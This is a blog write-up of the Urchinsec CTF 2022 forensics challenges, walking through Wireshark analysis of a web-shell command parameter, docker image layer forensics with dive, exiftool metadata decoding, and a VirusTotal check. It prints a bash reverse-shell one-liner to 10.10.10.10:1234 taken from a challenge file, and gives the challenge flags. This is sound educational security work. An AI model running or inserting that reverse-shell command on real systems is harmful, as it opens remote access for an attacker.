Post

URCHINSEC CTF MMXXII Forensics WriteUp

Hey guys and welcome to my blog. Today i will be tackling all challenges i knocked in Urchinsec’s CTF. This was a jeopardy type CTF hosted by our competitors, Urchinsec. I majorly focussed on forensics category but attempted some web & OSINT challenges. Special thanks to forensic author, @tahaafarooq and the whole gang for organising the CTF. With that said, lets dive in.

Streams

We were able to capture some packets that we believe to have some information about what the hacker had done after installing a backdoor on our server system , can you figure out what took?

In this challenge, you are given a packet capture file to figure out what the attacker might have taken. First thing i do when opening a pcap file is look at the protocal hierarchy statistics to see what protocols have been used frequently.(This can be found by navigating to Statistics > Protocal Hierarchy Statistics) In this case, HTTP protocol is a good place to start since traffic is mostly unencrypted. We see that we have some Line-based text data. We can right click on it and apply as a filter.

image

We now have 8 packets which seem to give a clue to what really happened. The attacker abused the cmd parameter to execute system commands.

image

He run the id & whoami command to find out who the current user,

image

ls command to list files in the current directory

image

He then read the contents of the flag.

image

urchin{wireshark_1s_pr3tty_g00d_f0r_analys!NG}

Duck Duck Dock

Ashes everywhere , my past has turned into ashes , i’m about to lose it!

In this challenge, you are given a compressed docker image for analysis. I used a tool called dive to analyse the docker image layers before extracting.

dive is a tool for exploring a docker image, layer contents, and discovering ways to shrink the size of your Docker/OCI image.

You can install the tool with this simple one-liner:

wget https://github.com/wagoodman/dive/releases/download/v0.10.0/dive_0.10.0_linux_amd64.deb && sudo apt install ./dive_0.10.0_linux_amd64.deb

Run the following command to start diving😅

dive docker-archive://duckdock.tar

image

From the screenshot above, we can see the compressed docker image has 4 layers. We have a left and right pane. To navigate to the next layer, hit the down arrow key. To switch to the right pane, hit the Tab Key. In docker forensics we’d be interested to look at the modified or deleted files. In this case, when you switch to the right side and hit ctrl+u, you can see modified files in that layer.(refer to the screenshot below)

image

In this case we see we jacob’s home directory containing bash_history.

image

Third layer had a bash script in the /opt directory

image

Last layer had a flag in admin’s home directory.

image

I will give you short cut although its always good doing some manual analysis😉

You can add -j parameter to the previous command to write the layer analysis statistics to a given file.

image

Thats preety much what we found what when manually diving. Take note of the highlighted layer id’s as those are the ones we can dig in and understand more about the image.

Since this is a tar file, you can axtract it using the following command:

tar xvf duckdock.tar

image

Exploring the layer containing bash history, we can see a user being created and deleted, modification of the bash script as well as a hint.🤔 Looking at flag file in admin’s home dir, we get more pewpew’s 😅

image

image

Anyway, looking at the layer containing the bash script, we get the flag as a wierd string.

image

Using cyberchef to decode it, we get the flag.

image

urchin{d>cker_f>rensics_is_fun}

Meta

Metaverse, Metadata, Metaphor, blah blah

In this challenge you are given an image. First thing that comes to mind is doing some steg analysis. Using exiftool , you can look at the file metadata to get potentially useful info. Looking at the Artist parameter, i noted an odd string.

image

Using cyberchef you can easily identify the string type using the Magic module. From there we learn that its hex encoded. Decoding it gives you a flag.

image

urchin{metadatas_4re_v3ry_int3r3sting_stuff}

Virxx

This is madness a 0/56 how how how? can you figure out how this happened?

In this challenge, you are given a file containing some ASCII text. cating the contents of the flag, you get a bash onliner. Tried even running strings on it but got stuck.😪

1
2
3
4
5
6
7
8
9
➜  file file
file: ASCII text
➜  wc file
 1  6 50 file
➜  cat file
bash -c "bash -i &>/dev/tcp/10.10.10.10/1234 <&1"
➜  strings file
bash -c "bash -i &>/dev/tcp/10.10.10.10/1234 <&1"

It took me a while to figure out how to proceed from here. Got a nudge from my team mate Winter to think about the name of the challenge. Virustotal!!! I uploaded the file to Virustotal and got the flag.😅

image

urchin{basic_skill_in_mal_analysis}

Thats it. Hopefully you learnt a thing or two. Generally the CTF was fun and looking foward to their next CTF coming up in Sept. If you have any questions, feel free to ping me on twitter @oste_ke. Till next time, take care and keep safe. 😎

This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.